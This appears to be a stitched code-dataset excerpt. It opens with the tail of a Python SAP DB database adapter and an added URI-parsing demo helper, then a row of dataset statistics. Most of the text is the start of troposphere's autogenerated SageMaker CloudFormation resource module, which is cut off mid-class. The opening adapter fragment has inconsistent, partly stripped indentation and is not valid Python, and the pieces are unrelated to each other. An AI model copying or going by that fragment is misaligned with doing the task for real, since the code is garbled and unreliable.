ruri = self.uri.split("://", 1)[1]
m = re.match(self.REGEX_URI, ruri)
if not m:
raise SyntaxError("Invalid URI string in DAL")
user = self.credential_decoder(m.group("user"))
password = self.credential_decoder(m.group("password"))
if password is None:
password = ""
host = m.group("host")
db = m.group("db")
self.driver_args.update(user=user, password=password, database=db, host=host)
    def connector(self):
        # Return the live driver connection so the base adapter can store and use it.
        return self.driver.connect(**self.driver_args)
def lastrowid(self, table):
self.execute("select %s.NEXTVAL from dual" % table._sequence_name)
return long(self.cursor.fetchone()[0])
def create_sequence_and_triggers(self, query, table, **args):
self.execute("CREATE SEQUENCE %s;" % table._sequence_name)
self.execute(
"ALTER TABLE %s ALTER COLUMN %s SET DEFAULT NEXTVAL('%s');"
% (table._rname, table._id._rname, table._sequence_name)
)
self.execute(query)
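# --- Hedged example (not part of the original adapter) ---
# A small helper showing how the REGEX_URI pattern above splits a SAP DB
# connection string; the sample credentials, host and db name are invented.
def _demo_parse_uri(uri="scott:tiger@dbhost/mydb"):
    m = re.match(SAPDB.REGEX_URI, uri)
    # For the default sample this yields: scott / tiger / dbhost / mydb
    return m.group("user"), m.group("password"), m.group("host"), m.group("db")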
| 32.422222 | 85 | 0.592186 | 175 | 1,459 | 4.794286 | 0.428571 | 0.028605 | 0.060787 | 0.052443 | 0.131108 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002712 | 0.241947 | 1,459 | 44 | 86 | 33.159091 | 0.755877 | 0 | 0 | 0 | 0 | 0 | 0.169294 | 0.056888 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0.135135 | 0.108108 | 0 | 0.351351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4836dce172471538808ff516434e702497a39d34 | 39,841 | py | Python | troposphere/sagemaker.py | filipepmo/troposphere | b1590f58ed8cc86ba18a19ed93fc9380d6f7306b | [
"BSD-2-Clause"
] | null | null | null | troposphere/sagemaker.py | filipepmo/troposphere | b1590f58ed8cc86ba18a19ed93fc9380d6f7306b | [
"BSD-2-Clause"
] | null | null | null | troposphere/sagemaker.py | filipepmo/troposphere | b1590f58ed8cc86ba18a19ed93fc9380d6f7306b | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) 2012-2022, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
#
# *** Do not modify - this file is autogenerated ***
# Resource specification version: 51.0.0
from . import AWSObject, AWSProperty, PropsDictType, Tags
from .validators import boolean, double, integer
class ResourceSpec(AWSProperty):
"""
`ResourceSpec <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-userprofile-resourcespec.html>`__
"""
props: PropsDictType = {
"InstanceType": (str, False),
"SageMakerImageArn": (str, False),
"SageMakerImageVersionArn": (str, False),
}
class App(AWSObject):
"""
`App <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-app.html>`__
"""
resource_type = "AWS::SageMaker::App"
props: PropsDictType = {
"AppName": (str, True),
"AppType": (str, True),
"DomainId": (str, True),
"ResourceSpec": (ResourceSpec, False),
"Tags": (Tags, False),
"UserProfileName": (str, True),
}
class FileSystemConfig(AWSProperty):
"""
`FileSystemConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-appimageconfig-filesystemconfig.html>`__
"""
props: PropsDictType = {
"DefaultGid": (integer, False),
"DefaultUid": (integer, False),
"MountPath": (str, False),
}
class KernelSpec(AWSProperty):
"""
`KernelSpec <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-appimageconfig-kernelspec.html>`__
"""
props: PropsDictType = {
"DisplayName": (str, False),
"Name": (str, True),
}
class KernelGatewayImageConfig(AWSProperty):
"""
`KernelGatewayImageConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-appimageconfig-kernelgatewayimageconfig.html>`__
"""
props: PropsDictType = {
"FileSystemConfig": (FileSystemConfig, False),
"KernelSpecs": ([KernelSpec], True),
}
class AppImageConfig(AWSObject):
"""
`AppImageConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-appimageconfig.html>`__
"""
resource_type = "AWS::SageMaker::AppImageConfig"
props: PropsDictType = {
"AppImageConfigName": (str, True),
"KernelGatewayImageConfig": (KernelGatewayImageConfig, False),
"Tags": (Tags, False),
}
class GitConfig(AWSProperty):
"""
`GitConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-coderepository-gitconfig.html>`__
"""
props: PropsDictType = {
"Branch": (str, False),
"RepositoryUrl": (str, True),
"SecretArn": (str, False),
}
class CodeRepository(AWSObject):
"""
`CodeRepository <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-coderepository.html>`__
"""
resource_type = "AWS::SageMaker::CodeRepository"
props: PropsDictType = {
"CodeRepositoryName": (str, False),
"GitConfig": (GitConfig, True),
"Tags": (Tags, False),
}
class DataQualityAppSpecification(AWSProperty):
"""
`DataQualityAppSpecification <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-dataqualityjobdefinition-dataqualityappspecification.html>`__
"""
props: PropsDictType = {
"ContainerArguments": ([str], False),
"ContainerEntrypoint": ([str], False),
"Environment": (dict, False),
"ImageUri": (str, True),
"PostAnalyticsProcessorSourceUri": (str, False),
"RecordPreprocessorSourceUri": (str, False),
}
class ConstraintsResource(AWSProperty):
"""
`ConstraintsResource <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-constraintsresource.html>`__
"""
props: PropsDictType = {
"S3Uri": (str, False),
}
class StatisticsResource(AWSProperty):
"""
`StatisticsResource <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-statisticsresource.html>`__
"""
props: PropsDictType = {
"S3Uri": (str, False),
}
class DataQualityBaselineConfig(AWSProperty):
"""
`DataQualityBaselineConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-dataqualityjobdefinition-dataqualitybaselineconfig.html>`__
"""
props: PropsDictType = {
"BaseliningJobName": (str, False),
"ConstraintsResource": (ConstraintsResource, False),
"StatisticsResource": (StatisticsResource, False),
}
class EndpointInput(AWSProperty):
"""
`EndpointInput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-endpointinput.html>`__
"""
props: PropsDictType = {
"EndpointName": (str, True),
"LocalPath": (str, True),
"S3DataDistributionType": (str, False),
"S3InputMode": (str, False),
}
class DataQualityJobInput(AWSProperty):
"""
`DataQualityJobInput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-dataqualityjobdefinition-dataqualityjobinput.html>`__
"""
props: PropsDictType = {
"EndpointInput": (EndpointInput, True),
}
class S3Output(AWSProperty):
"""
`S3Output <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-s3output.html>`__
"""
props: PropsDictType = {
"LocalPath": (str, True),
"S3UploadMode": (str, False),
"S3Uri": (str, True),
}
class MonitoringOutput(AWSProperty):
"""
`MonitoringOutput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringoutput.html>`__
"""
props: PropsDictType = {
"S3Output": (S3Output, True),
}
class MonitoringOutputConfig(AWSProperty):
"""
`MonitoringOutputConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringoutputconfig.html>`__
"""
props: PropsDictType = {
"KmsKeyId": (str, False),
"MonitoringOutputs": ([MonitoringOutput], True),
}
class ClusterConfig(AWSProperty):
"""
`ClusterConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-clusterconfig.html>`__
"""
props: PropsDictType = {
"InstanceCount": (integer, True),
"InstanceType": (str, True),
"VolumeKmsKeyId": (str, False),
"VolumeSizeInGB": (integer, True),
}
class MonitoringResources(AWSProperty):
"""
`MonitoringResources <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-monitoringresources.html>`__
"""
props: PropsDictType = {
"ClusterConfig": (ClusterConfig, True),
}
class VpcConfig(AWSProperty):
"""
`VpcConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-vpcconfig.html>`__
"""
props: PropsDictType = {
"SecurityGroupIds": ([str], True),
"Subnets": ([str], True),
}
class NetworkConfig(AWSProperty):
"""
`NetworkConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-networkconfig.html>`__
"""
props: PropsDictType = {
"EnableInterContainerTrafficEncryption": (boolean, False),
"EnableNetworkIsolation": (boolean, False),
"VpcConfig": (VpcConfig, False),
}
class StoppingCondition(AWSProperty):
"""
`StoppingCondition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-monitoringschedule-stoppingcondition.html>`__
"""
props: PropsDictType = {
"MaxRuntimeInSeconds": (integer, True),
}
class DataQualityJobDefinition(AWSObject):
"""
`DataQualityJobDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-dataqualityjobdefinition.html>`__
"""
resource_type = "AWS::SageMaker::DataQualityJobDefinition"
props: PropsDictType = {
"DataQualityAppSpecification": (DataQualityAppSpecification, True),
"DataQualityBaselineConfig": (DataQualityBaselineConfig, False),
"DataQualityJobInput": (DataQualityJobInput, True),
"DataQualityJobOutputConfig": (MonitoringOutputConfig, True),
"JobDefinitionName": (str, False),
"JobResources": (MonitoringResources, True),
"NetworkConfig": (NetworkConfig, False),
"RoleArn": (str, True),
"StoppingCondition": (StoppingCondition, False),
"Tags": (Tags, False),
}
class DeviceProperty(AWSProperty):
"""
`DeviceProperty <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-device-device.html>`__
"""
props: PropsDictType = {
"Description": (str, False),
"DeviceName": (str, True),
"IotThingName": (str, False),
}
class Device(AWSObject):
"""
`Device <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-device.html>`__
"""
resource_type = "AWS::SageMaker::Device"
props: PropsDictType = {
"Device": (DeviceProperty, False),
"DeviceFleetName": (str, True),
"Tags": (Tags, False),
}
class EdgeOutputConfig(AWSProperty):
"""
`EdgeOutputConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-devicefleet-edgeoutputconfig.html>`__
"""
props: PropsDictType = {
"KmsKeyId": (str, False),
"S3OutputLocation": (str, True),
}
class DeviceFleet(AWSObject):
"""
`DeviceFleet <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-devicefleet.html>`__
"""
resource_type = "AWS::SageMaker::DeviceFleet"
props: PropsDictType = {
"Description": (str, False),
"DeviceFleetName": (str, True),
"OutputConfig": (EdgeOutputConfig, True),
"RoleArn": (str, True),
"Tags": (Tags, False),
}
class JupyterServerAppSettings(AWSProperty):
"""
`JupyterServerAppSettings <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-userprofile-jupyterserverappsettings.html>`__
"""
props: PropsDictType = {
"DefaultResourceSpec": (ResourceSpec, False),
}
class CustomImage(AWSProperty):
"""
`CustomImage <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-userprofile-customimage.html>`__
"""
props: PropsDictType = {
"AppImageConfigName": (str, True),
"ImageName": (str, True),
"ImageVersionNumber": (integer, False),
}
class KernelGatewayAppSettings(AWSProperty):
"""
`KernelGatewayAppSettings <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-userprofile-kernelgatewayappsettings.html>`__
"""
props: PropsDictType = {
"CustomImages": ([CustomImage], False),
"DefaultResourceSpec": (ResourceSpec, False),
}
class SharingSettings(AWSProperty):
"""
`SharingSettings <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-userprofile-sharingsettings.html>`__
"""
props: PropsDictType = {
"NotebookOutputOption": (str, False),
"S3KmsKeyId": (str, False),
"S3OutputPath": (str, False),
}
class UserSettings(AWSProperty):
"""
`UserSettings <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-userprofile-usersettings.html>`__
"""
props: PropsDictType = {
"ExecutionRole": (str, False),
"JupyterServerAppSettings": (JupyterServerAppSettings, False),
"KernelGatewayAppSettings": (KernelGatewayAppSettings, False),
"SecurityGroups": ([str], False),
"SharingSettings": (SharingSettings, False),
}
class Domain(AWSObject):
"""
`Domain <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-domain.html>`__
"""
resource_type = "AWS::SageMaker::Domain"
props: PropsDictType = {
"AppNetworkAccessType": (str, False),
"AuthMode": (str, True),
"DefaultUserSettings": (UserSettings, True),
"DomainName": (str, True),
"KmsKeyId": (str, False),
"SubnetIds": ([str], True),
"Tags": (Tags, False),
"VpcId": (str, True),
}
class Alarm(AWSProperty):
"""
`Alarm <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-alarm.html>`__
"""
props: PropsDictType = {
"AlarmName": (str, True),
}
class AutoRollbackConfig(AWSProperty):
"""
`AutoRollbackConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-autorollbackconfig.html>`__
"""
props: PropsDictType = {
"Alarms": ([Alarm], True),
}
class CapacitySize(AWSProperty):
"""
`CapacitySize <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-capacitysize.html>`__
"""
props: PropsDictType = {
"Type": (str, True),
"Value": (integer, True),
}
class TrafficRoutingConfig(AWSProperty):
"""
`TrafficRoutingConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-trafficroutingconfig.html>`__
"""
props: PropsDictType = {
"CanarySize": (CapacitySize, False),
"LinearStepSize": (CapacitySize, False),
"Type": (str, True),
"WaitIntervalInSeconds": (integer, False),
}
class BlueGreenUpdatePolicy(AWSProperty):
"""
`BlueGreenUpdatePolicy <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-bluegreenupdatepolicy.html>`__
"""
props: PropsDictType = {
"MaximumExecutionTimeoutInSeconds": (integer, False),
"TerminationWaitInSeconds": (integer, False),
"TrafficRoutingConfiguration": (TrafficRoutingConfig, True),
}
class DeploymentConfig(AWSProperty):
"""
`DeploymentConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-deploymentconfig.html>`__
"""
props: PropsDictType = {
"AutoRollbackConfiguration": (AutoRollbackConfig, False),
"BlueGreenUpdatePolicy": (BlueGreenUpdatePolicy, True),
}
class VariantProperty(AWSProperty):
"""
`VariantProperty <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpoint-variantproperty.html>`__
"""
props: PropsDictType = {
"VariantPropertyType": (str, False),
}
class Endpoint(AWSObject):
"""
`Endpoint <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-endpoint.html>`__
"""
resource_type = "AWS::SageMaker::Endpoint"
props: PropsDictType = {
"DeploymentConfig": (DeploymentConfig, False),
"EndpointConfigName": (str, True),
"EndpointName": (str, False),
"ExcludeRetainedVariantProperties": ([VariantProperty], False),
"RetainAllVariantProperties": (boolean, False),
"RetainDeploymentConfig": (boolean, False),
"Tags": (Tags, False),
}
class AsyncInferenceClientConfig(AWSProperty):
"""
`AsyncInferenceClientConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-asyncinferenceclientconfig.html>`__
"""
props: PropsDictType = {
"MaxConcurrentInvocationsPerInstance": (integer, False),
}
class AsyncInferenceNotificationConfig(AWSProperty):
"""
`AsyncInferenceNotificationConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-asyncinferencenotificationconfig.html>`__
"""
props: PropsDictType = {
"ErrorTopic": (str, False),
"SuccessTopic": (str, False),
}
class AsyncInferenceOutputConfig(AWSProperty):
"""
`AsyncInferenceOutputConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-asyncinferenceoutputconfig.html>`__
"""
props: PropsDictType = {
"KmsKeyId": (str, False),
"NotificationConfig": (AsyncInferenceNotificationConfig, False),
"S3OutputPath": (str, True),
}
class AsyncInferenceConfig(AWSProperty):
"""
`AsyncInferenceConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-asyncinferenceconfig.html>`__
"""
props: PropsDictType = {
"ClientConfig": (AsyncInferenceClientConfig, False),
"OutputConfig": (AsyncInferenceOutputConfig, True),
}
class CaptureContentTypeHeader(AWSProperty):
"""
`CaptureContentTypeHeader <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-datacaptureconfig-capturecontenttypeheader.html>`__
"""
props: PropsDictType = {
"CsvContentTypes": ([str], False),
"JsonContentTypes": ([str], False),
}
class CaptureOption(AWSProperty):
"""
`CaptureOption <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-captureoption.html>`__
"""
props: PropsDictType = {
"CaptureMode": (str, True),
}
class DataCaptureConfig(AWSProperty):
"""
`DataCaptureConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-datacaptureconfig.html>`__
"""
props: PropsDictType = {
"CaptureContentTypeHeader": (CaptureContentTypeHeader, False),
"CaptureOptions": ([CaptureOption], True),
"DestinationS3Uri": (str, True),
"EnableCapture": (boolean, False),
"InitialSamplingPercentage": (integer, True),
"KmsKeyId": (str, False),
}
class ServerlessConfig(AWSProperty):
"""
`ServerlessConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-productionvariant-serverlessconfig.html>`__
"""
props: PropsDictType = {
"MaxConcurrency": (integer, True),
"MemorySizeInMB": (integer, True),
}
class ProductionVariant(AWSProperty):
"""
`ProductionVariant <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-endpointconfig-productionvariant.html>`__
"""
props: PropsDictType = {
"AcceleratorType": (str, False),
"InitialInstanceCount": (integer, False),
"InitialVariantWeight": (double, True),
"InstanceType": (str, False),
"ModelName": (str, True),
"ServerlessConfig": (ServerlessConfig, False),
"VariantName": (str, True),
}
class EndpointConfig(AWSObject):
"""
`EndpointConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-endpointconfig.html>`__
"""
resource_type = "AWS::SageMaker::EndpointConfig"
props: PropsDictType = {
"AsyncInferenceConfig": (AsyncInferenceConfig, False),
"DataCaptureConfig": (DataCaptureConfig, False),
"EndpointConfigName": (str, False),
"KmsKeyId": (str, False),
"ProductionVariants": ([ProductionVariant], True),
"Tags": (Tags, False),
}
class FeatureDefinition(AWSProperty):
"""
`FeatureDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-featuregroup-featuredefinition.html>`__
"""
props: PropsDictType = {
"FeatureName": (str, True),
"FeatureType": (str, True),
}
class FeatureGroup(AWSObject):
"""
`FeatureGroup <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-featuregroup.html>`__
"""
resource_type = "AWS::SageMaker::FeatureGroup"
props: PropsDictType = {
"Description": (str, False),
"EventTimeFeatureName": (str, True),
"FeatureDefinitions": ([FeatureDefinition], True),
"FeatureGroupName": (str, True),
"OfflineStoreConfig": (dict, False),
"OnlineStoreConfig": (dict, False),
"RecordIdentifierFeatureName": (str, True),
"RoleArn": (str, False),
"Tags": (Tags, False),
}
class Image(AWSObject):
"""
`Image <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-image.html>`__
"""
resource_type = "AWS::SageMaker::Image"
props: PropsDictType = {
"ImageDescription": (str, False),
"ImageDisplayName": (str, False),
"ImageName": (str, True),
"ImageRoleArn": (str, True),
"Tags": (Tags, False),
}
class ImageVersion(AWSObject):
"""
`ImageVersion <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-imageversion.html>`__
"""
resource_type = "AWS::SageMaker::ImageVersion"
props: PropsDictType = {
"BaseImage": (str, True),
"ImageName": (str, True),
}
class RepositoryAuthConfig(AWSProperty):
"""
`RepositoryAuthConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-model-containerdefinition-imageconfig-repositoryauthconfig.html>`__
"""
props: PropsDictType = {
"RepositoryCredentialsProviderArn": (str, True),
}
class ImageConfig(AWSProperty):
"""
`ImageConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-model-containerdefinition-imageconfig.html>`__
"""
props: PropsDictType = {
"RepositoryAccessMode": (str, True),
"RepositoryAuthConfig": (RepositoryAuthConfig, False),
}
class MultiModelConfig(AWSProperty):
"""
`MultiModelConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-model-containerdefinition-multimodelconfig.html>`__
"""
props: PropsDictType = {
"ModelCacheSetting": (str, False),
}
class ContainerDefinition(AWSProperty):
"""
`ContainerDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-model-containerdefinition.html>`__
"""
props: PropsDictType = {
"ContainerHostname": (str, False),
"Environment": (dict, False),
"Image": (str, False),
"ImageConfig": (ImageConfig, False),
"InferenceSpecificationName": (str, False),
"Mode": (str, False),
"ModelDataUrl": (str, False),
"ModelPackageName": (str, False),
"MultiModelConfig": (MultiModelConfig, False),
}
class InferenceExecutionConfig(AWSProperty):
"""
`InferenceExecutionConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-model-inferenceexecutionconfig.html>`__
"""
props: PropsDictType = {
"Mode": (str, True),
}
class Model(AWSObject):
"""
`Model <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-model.html>`__
"""
resource_type = "AWS::SageMaker::Model"
props: PropsDictType = {
"Containers": ([ContainerDefinition], False),
"EnableNetworkIsolation": (boolean, False),
"ExecutionRoleArn": (str, True),
"InferenceExecutionConfig": (InferenceExecutionConfig, False),
"ModelName": (str, False),
"PrimaryContainer": (ContainerDefinition, False),
"Tags": (Tags, False),
"VpcConfig": (VpcConfig, False),
}
class ModelBiasAppSpecification(AWSProperty):
"""
`ModelBiasAppSpecification <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelbiasjobdefinition-modelbiasappspecification.html>`__
"""
props: PropsDictType = {
"ConfigUri": (str, True),
"Environment": (dict, False),
"ImageUri": (str, True),
}
class ModelBiasBaselineConfig(AWSProperty):
"""
`ModelBiasBaselineConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelbiasjobdefinition-modelbiasbaselineconfig.html>`__
"""
props: PropsDictType = {
"BaseliningJobName": (str, False),
"ConstraintsResource": (ConstraintsResource, False),
}
class MonitoringGroundTruthS3Input(AWSProperty):
"""
`MonitoringGroundTruthS3Input <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelqualityjobdefinition-monitoringgroundtruths3input.html>`__
"""
props: PropsDictType = {
"S3Uri": (str, True),
}
class ModelBiasJobInput(AWSProperty):
"""
`ModelBiasJobInput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelbiasjobdefinition-modelbiasjobinput.html>`__
"""
props: PropsDictType = {
"EndpointInput": (EndpointInput, True),
"GroundTruthS3Input": (MonitoringGroundTruthS3Input, True),
}
class ModelBiasJobDefinition(AWSObject):
"""
`ModelBiasJobDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-modelbiasjobdefinition.html>`__
"""
resource_type = "AWS::SageMaker::ModelBiasJobDefinition"
props: PropsDictType = {
"JobDefinitionName": (str, False),
"JobResources": (MonitoringResources, True),
"ModelBiasAppSpecification": (ModelBiasAppSpecification, True),
"ModelBiasBaselineConfig": (ModelBiasBaselineConfig, False),
"ModelBiasJobInput": (ModelBiasJobInput, True),
"ModelBiasJobOutputConfig": (MonitoringOutputConfig, True),
"NetworkConfig": (NetworkConfig, False),
"RoleArn": (str, True),
"StoppingCondition": (StoppingCondition, False),
"Tags": (Tags, False),
}
class ModelExplainabilityAppSpecification(AWSProperty):
"""
`ModelExplainabilityAppSpecification <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelexplainabilityjobdefinition-modelexplainabilityappspecification.html>`__
"""
props: PropsDictType = {
"ConfigUri": (str, True),
"Environment": (dict, False),
"ImageUri": (str, True),
}
class ModelExplainabilityBaselineConfig(AWSProperty):
"""
`ModelExplainabilityBaselineConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelexplainabilityjobdefinition-modelexplainabilitybaselineconfig.html>`__
"""
props: PropsDictType = {
"BaseliningJobName": (str, False),
"ConstraintsResource": (ConstraintsResource, False),
}
class ModelExplainabilityJobInput(AWSProperty):
"""
`ModelExplainabilityJobInput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelexplainabilityjobdefinition-modelexplainabilityjobinput.html>`__
"""
props: PropsDictType = {
"EndpointInput": (EndpointInput, True),
}
class ModelExplainabilityJobDefinition(AWSObject):
"""
`ModelExplainabilityJobDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-modelexplainabilityjobdefinition.html>`__
"""
resource_type = "AWS::SageMaker::ModelExplainabilityJobDefinition"
props: PropsDictType = {
"JobDefinitionName": (str, False),
"JobResources": (MonitoringResources, True),
"ModelExplainabilityAppSpecification": (
ModelExplainabilityAppSpecification,
True,
),
"ModelExplainabilityBaselineConfig": (ModelExplainabilityBaselineConfig, False),
"ModelExplainabilityJobInput": (ModelExplainabilityJobInput, True),
"ModelExplainabilityJobOutputConfig": (MonitoringOutputConfig, True),
"NetworkConfig": (NetworkConfig, False),
"RoleArn": (str, True),
"StoppingCondition": (StoppingCondition, False),
"Tags": (Tags, False),
}
class ModelPackageGroup(AWSObject):
"""
`ModelPackageGroup <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-modelpackagegroup.html>`__
"""
resource_type = "AWS::SageMaker::ModelPackageGroup"
props: PropsDictType = {
"ModelPackageGroupDescription": (str, False),
"ModelPackageGroupName": (str, True),
"ModelPackageGroupPolicy": (dict, False),
"Tags": (Tags, False),
}
class ModelQualityAppSpecification(AWSProperty):
"""
`ModelQualityAppSpecification <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelqualityjobdefinition-modelqualityappspecification.html>`__
"""
props: PropsDictType = {
"ContainerArguments": ([str], False),
"ContainerEntrypoint": ([str], False),
"Environment": (dict, False),
"ImageUri": (str, True),
"PostAnalyticsProcessorSourceUri": (str, False),
"ProblemType": (str, True),
"RecordPreprocessorSourceUri": (str, False),
}
class ModelQualityBaselineConfig(AWSProperty):
"""
`ModelQualityBaselineConfig <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelqualityjobdefinition-modelqualitybaselineconfig.html>`__
"""
props: PropsDictType = {
"BaseliningJobName": (str, False),
"ConstraintsResource": (ConstraintsResource, False),
}
class ModelQualityJobInput(AWSProperty):
"""
`ModelQualityJobInput <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-sagemaker-modelqualityjobdefinition-modelqualityjobinput.html>`__
"""
props: PropsDictType = {
"EndpointInput": (EndpointInput, True),
"GroundTruthS3Input": (MonitoringGroundTruthS3Input, True),
}
class ModelQualityJobDefinition(AWSObject):
"""
`ModelQualityJobDefinition <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-modelqualityjobdefinition.html>`__
"""
resource_type = "AWS::SageMaker::ModelQualityJobDefinition"
props: PropsDictType = {
"JobDefinitionName": (str, False),
"JobResources": (MonitoringResources, True),
"ModelQualityAppSpecification": (ModelQualityAppSpecification, True),
"ModelQualityBaselineConfig": (ModelQualityBaselineConfig, False),
"ModelQualityJobInput": (ModelQualityJobInput, True),
"ModelQualityJobOutputConfig": (MonitoringOutputConfig, True),
"NetworkConfig": (NetworkConfig, False),
"RoleArn": (str, True),
"StoppingCondition": (StoppingCondition, False),
"Tags": (Tags, False),
}
class MonitoringExecutionSummary(AWSProperty):
"""
